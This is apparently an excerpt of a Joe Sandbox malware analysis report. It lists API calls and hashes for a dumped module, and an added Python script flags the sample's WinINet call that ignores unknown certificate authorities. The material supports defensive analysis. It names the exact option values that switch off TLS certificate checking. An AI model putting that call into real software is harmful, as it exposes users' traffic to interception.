• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                                    • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                                    • Opcode ID: 56711ad8913afac0ccbd4c84e85024cf93101144816d7e86af153de4fbb42abc
                                                                                                                                                                                                                                                                                    • Instruction ID: ad4594ed0d2bdf57e32c994e8a4ede67c68cb19d2b07c663a0eb51708a71de65
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56711ad8913afac0ccbd4c84e85024cf93101144816d7e86af153de4fbb42abc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C717870148344AFD725CF18CC48F6ABBF9EF89300F0485AEF99997261CB70A946CB12
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00AE24B0
                                                                                                                                                                                                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00B79BA3
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B780AE: ClientToScreen.USER32(?,?), ref: 00B780D4
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B780AE: GetWindowRect.USER32(?,?), ref: 00B7814A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B780AE: PtInRect.USER32(?,?,?), ref: 00B7815A
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00B79C0C
                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B79C17
                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B79C3A
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B79C81
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00B79C9A
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00B79CB1
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00B79CD3
                                                                                                                                                                                                                                                                                    • DragFinish.SHELL32(?), ref: 00B79CDA
                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00B79DCD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                                    • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                                                                    • Opcode ID: c8bbb9a70b97be9e3142072e5029b0650cfe7af4a43bc1bf1cbd85150e36c287
                                                                                                                                                                                                                                                                                    • Instruction ID: 8e0667babf9bbebf2e874ec9171690df50fc52ce62e195ae3715bd2d728282c6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8bbb9a70b97be9e3142072e5029b0650cfe7af4a43bc1bf1cbd85150e36c287
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC615871108341AFC705EF65CC89DABBBF8EF88750F40096DF5A9931A1DB709A49CB62
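The WinINet sequence in the function block that follows (InternetQueryOptionW and then InternetSetOptionW on option 0x1F, which is INTERNET_OPTION_SECURITY_FLAGS, writing the value 0x100, which is SECURITY_FLAG_IGNORE_UNKNOWN_CA) is the one detail in this part of the listing worth an automated check: it stops WinINet from rejecting a server certificate chained to an unknown CA on that request handle, so an interposed TLS endpoint would go unnoticed by the transfer. The Python below is an added example and not part of the Joe Sandbox report. It parses API lines in the format the report prints them (the sample input is a constructed string copied from the block that follows), turns the hex arguments into integers, and flags every InternetSetOptionW that sets any SECURITY_FLAG_IGNORE_* bit. The constant values are taken from wininet.h; the line regex, the ApiCall record and the shape of the finding dictionary are this example's own assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: the WinINet lines of the next function block, in the
# shape Joe Sandbox prints them (bullet, API.MODULE(args), ref: call-site address).
SAMPLE_TRACE = """\
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B5CEF5
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B5CF08
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B5CF1C
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B5CF35
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00B5CF78
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B5CF8E
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B5CF99
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B5CFC9
"""

# Values from wininet.h.
INTERNET_OPTION_SECURITY_FLAGS = 31  # 0x1F
IGNORE_FLAGS = {
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}

# One report line: optional "Part of subcall function XXXX:" prefix, API.MODULE,
# optional "(args)" (GetDesktopWindow is printed without one), then "ref: addr".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]  # raw tokens; "?" means the sandbox could not resolve the value
    ref: str         # address of the call site in the dumped module


def as_int(token: str) -> Optional[int]:
    """Hex argument as printed by the sandbox; None for '?' and for string literals
    such as tooltips_class32 (a literal that happens to look like hex is ambiguous
    in the report itself and is parsed as a number here)."""
    try:
        return int(token, 16)
    except ValueError:
        return None


def parse_trace(text: str) -> List[ApiCall]:
    """Parse the 'APIs' listing; headings like 'Strings' simply do not match."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, m.group("ref")))
    return calls


def find_tls_bypass(calls: List[ApiCall]) -> List[dict]:
    """Flag InternetSetOptionW(h, INTERNET_OPTION_SECURITY_FLAGS, flags, 4) whose
    flags contain any SECURITY_FLAG_IGNORE_* bit. Also records whether the same
    option was queried just before, the usual read-modify-write pattern."""
    findings = []
    for i, c in enumerate(calls):
        if c.api != "InternetSetOptionW" or len(c.args) < 3:
            continue
        if as_int(c.args[1]) != INTERNET_OPTION_SECURITY_FLAGS:
            continue
        flags = as_int(c.args[2])
        if flags is None:
            continue
        names = [name for bit, name in IGNORE_FLAGS.items() if flags & bit]
        if not names:
            continue
        preceded_by_query = any(
            p.api == "InternetQueryOptionW"
            and len(p.args) >= 2
            and as_int(p.args[1]) == INTERNET_OPTION_SECURITY_FLAGS
            for p in calls[max(0, i - 3):i]
        )
        findings.append({"ref": c.ref, "flags": names, "read_modify_write": preceded_by_query})
    return findings


if __name__ == "__main__":
    for f in find_tls_bypass(parse_trace(SAMPLE_TRACE)):
        print(f"{f['ref']}: {', '.join(f['flags'])} (query-then-set: {f['read_modify_write']})")
```

The finding names only the call site (ref 00B5CF8E in the module the report dumps at 00AE0000 for process 0000000A). A static API listing does not by itself show that the sample's C2 traffic went through this routine with those flags; that has to be confirmed against the network and API-call logs elsewhere in the report before it is written up as the sample's behaviour.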
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B5CEF5
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B5CF08
                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B5CF1C
                                                                                                                                                                                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B5CF35
                                                                                                                                                                                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00B5CF78
                                                                                                                                                                                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B5CF8E
                                                                                                                                                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B5CF99
                                                                                                                                                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B5CFC9
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B5D021
                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B5D035
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00B5D040
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                                    • Opcode ID: 53249dcac38fef99811f9cf697ed8fd4cb883fab5ae84d65dd99b5a08f521d9e
                                                                                                                                                                                                                                                                                    • Instruction ID: fb6829d8d0275491e6310fefbb52016726f88d895c575dec1b95e90415549c44
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53249dcac38fef99811f9cf697ed8fd4cb883fab5ae84d65dd99b5a08f521d9e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A513AB1500704BFDB219F60CC88BAA7BFDFF48786F04459AF94997250DB34D949AB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00B766D6,?,?), ref: 00B78FEE
                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00B766D6,?,?,00000000,?), ref: 00B78FFE
                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00B766D6,?,?,00000000,?), ref: 00B79009
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00B766D6,?,?,00000000,?), ref: 00B79016
                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00B79024
                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00B766D6,?,?,00000000,?), ref: 00B79033
                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00B7903C
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00B766D6,?,?,00000000,?), ref: 00B79043
                                                                                                                                                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B766D6,?,?,00000000,?), ref: 00B79054
                                                                                                                                                                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B80C04,?), ref: 00B7906D
                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00B7907D
                                                                                                                                                                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00B7909D
                                                                                                                                                                                                                                                                                    • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00B790CD
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00B790F5
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B7910B
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 0b3d0f5d9c5ce22b5f7398b8f2f72cbea5958abd3ecc91bad112e666f79d21b7
                                                                                                                                                                                                                                                                                    • Instruction ID: 7b913ed71690b2c932ed763073c913f8d349fced91e3776ecdb7c19f29b6de9b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b3d0f5d9c5ce22b5f7398b8f2f72cbea5958abd3ecc91bad112e666f79d21b7
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0413A75600208BFDB119F65DC88EAE7BB8FF89751F108059F91AE7260DB309D41DB20
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B6C10E,?,?), ref: 00B6D415
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D451
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D4C8
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D4FE
                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B6C154
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B6C1D2
                                                                                                                                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 00B6C26A
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00B6C2DE
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00B6C2FC
                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00B6C352
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B6C364
                                                                                                                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B6C382
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00B6C3E3
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00B6C3F4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
• API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 146587525-4033151799
• Opcode ID: af6f100f5904287c0da5b9e9e01b3cb84a30edf81e1611d9c23c31449eac5ea1
• Instruction ID: 1b5f93c88f78cd2dccf3fd503ce362ad4058e0f45089c1126325897a5a29ef4d
• Opcode Fuzzy Hash: af6f100f5904287c0da5b9e9e01b3cb84a30edf81e1611d9c23c31449eac5ea1
• Instruction Fuzzy Hash: 2AC18D34204241AFD710DF25C495F2ABBE1FF85304F14859CE49A8B7A2CB79ED46CB91
APIs
• GetDC.USER32(00000000), ref: 00B63035
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B63045
• CreateCompatibleDC.GDI32(?), ref: 00B63051
• SelectObject.GDI32(00000000,?), ref: 00B6305E
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00B630CA
• GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00B63109
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00B6312D
• SelectObject.GDI32(?,?), ref: 00B63135
• DeleteObject.GDI32(?), ref: 00B6313E
• DeleteDC.GDI32(?), ref: 00B63145
• ReleaseDC.USER32(00000000,?), ref: 00B63150
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: 32480140b8a3bc7bc3972295f5636bddcd0190f50195baa4e21cf1ce9fc0dc54
• Instruction ID: ac4afced331e72e0c3a89d097bca9cea126b9c6e6f44196dc7847fd5878b1d4e
• Opcode Fuzzy Hash: 32480140b8a3bc7bc3972295f5636bddcd0190f50195baa4e21cf1ce9fc0dc54
• Instruction Fuzzy Hash: 2361D2B5D00219AFCF04CFA8D884EAEBBF5FF48710F208569E559A7250D775AA41CF90
APIs
  • Part of subcall function 00AE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00AE24B0
• GetSystemMetrics.USER32(0000000F), ref: 00B7A990
• GetSystemMetrics.USER32(00000011), ref: 00B7A9A7
• GetSystemMetrics.USER32(00000004), ref: 00B7A9B3
• GetSystemMetrics.USER32(0000000F), ref: 00B7A9C9
• MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00B7AC15
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B7AC33
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B7AC54
• ShowWindow.USER32(00000003,00000000), ref: 00B7AC73
• InvalidateRect.USER32(?,00000000,00000001), ref: 00B7AC95
• DefDlgProcW.USER32(?,00000005,?), ref: 00B7ACBB
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
• String ID: @
• API String ID: 3962739598-2766056989
• Opcode ID: 7a53c0cdab8e3e6d8e91163ee45b851dfe3f301672ee83b367a26eb6102588c1
• Instruction ID: 270b369b4b29e782b84bb9737ba770380e8e20e84f4d7aa89cc3c15cd38d51dd
• Opcode Fuzzy Hash: 7a53c0cdab8e3e6d8e91163ee45b851dfe3f301672ee83b367a26eb6102588c1
• Instruction Fuzzy Hash: 29B16731600219EBDF55CF68C9857AE7BF2FF84700F18C0A9ED59AB295DB70A980CB51
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 00B452E6
• GetWindowTextW.USER32(?,?,00000400), ref: 00B45328
• _wcslen.LIBCMT ref: 00B45339
• CharUpperBuffW.USER32(?,00000000), ref: 00B45345
• _wcsstr.LIBVCRUNTIME ref: 00B4537A
• GetClassNameW.USER32(00000018,?,00000400), ref: 00B453B2
• GetWindowTextW.USER32(?,?,00000400), ref: 00B453EB
• GetClassNameW.USER32(00000018,?,00000400), ref: 00B45445
• GetClassNameW.USER32(?,?,00000400), ref: 00B45477
• GetWindowRect.USER32(?,?), ref: 00B454EF
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
• String ID: ThumbnailClass
• API String ID: 1311036022-1241985126
• Opcode ID: fcba4434af34d3059af704f6cc409f60af70257d7d734fc3a4fa529e226b7846
• Instruction ID: 0574a5805fcc0501c377ac0769e8a75550c8b1f244fde755b8d28a467a05f8f5
• Opcode Fuzzy Hash: fcba4434af34d3059af704f6cc409f60af70257d7d734fc3a4fa529e226b7846
• Instruction Fuzzy Hash: 9591CE71104F06AFD728DF24C984BAAB7F9FF10340F004599FA8A82192EB31EE55DB91
APIs
  • Part of subcall function 00AE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00AE24B0
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B797B6
• GetFocus.USER32 ref: 00B797C6
• GetDlgCtrlID.USER32(00000000), ref: 00B797D1
• DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00B79879
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B7992B
• GetMenuItemCount.USER32(?), ref: 00B79948
• GetMenuItemID.USER32(?,00000000), ref: 00B79958
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B7998A
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B799CC
                                                                                                                                                                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B799FD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                    • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                                                                    • Opcode ID: e129dc36913d9f67505ff7f46deacca7cef77b6c9167632249cc7207b3fcec9f
                                                                                                                                                                                                                                                                                    • Instruction ID: 75c76f803fdb660dd24228a8f9e78af75e61a135393037d46de6eef33e604e55
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e129dc36913d9f67505ff7f46deacca7cef77b6c9167632249cc7207b3fcec9f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D281C3715083019FE710CF25C885A6B7BE8FF89354F00899DF9ADA7291DB70D905CBA2
APIs
• GetMenuItemInfoW.USER32(00BB29C0,000000FF,00000000,00000030), ref: 00B4C973
• SetMenuItemInfoW.USER32(00BB29C0,00000004,00000000,00000030), ref: 00B4C9A8
• Sleep.KERNEL32(000001F4), ref: 00B4C9BA
• GetMenuItemCount.USER32(?), ref: 00B4CA00
• GetMenuItemID.USER32(?,00000000), ref: 00B4CA1D
• GetMenuItemID.USER32(?,-00000001), ref: 00B4CA49
